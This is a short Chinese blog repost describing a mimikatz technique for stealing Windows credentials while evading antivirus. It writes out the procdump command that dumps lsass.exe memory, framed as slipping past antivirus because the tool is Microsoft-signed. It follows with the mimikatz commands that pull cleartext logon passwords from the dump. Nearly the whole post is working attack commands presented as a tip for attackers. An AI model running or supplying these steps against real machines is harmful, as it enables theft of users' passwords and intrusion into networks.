wuliuqiii

[转载] minikiz procdump 技巧

http://lanu.sinaapp.com/jishuwenzhang/145.html

mimikatz的一个新技巧

Date: 2013/6/9  Sort: 技术文章862 Views / 4 Comments / 

    刚看见一篇文章讲mimikatz的一个技巧,很多时候我们抓取明文的时候遇到杀毒软件,使得我的抓取失败。

    我们先利用微软的一个工具procdump.exe 有微软签名的东西,杀毒软件必须放过啊!

            C:\temp\procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp

    copy dmp文件回本地然后再用mimikatz查看明文密码:

           mimikatz # sekurlsa::minidump SUPERCOMPUTER_lsass.dmp

      mimikatz # sekurlsa::logonPasswords full

原文:http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html

       http://blog.gentilkiwi.com/securite/mimikatz/minidump

posted on 2014-01-03 22:02  wuliuqiii  阅读(133)  评论(0)    收藏  举报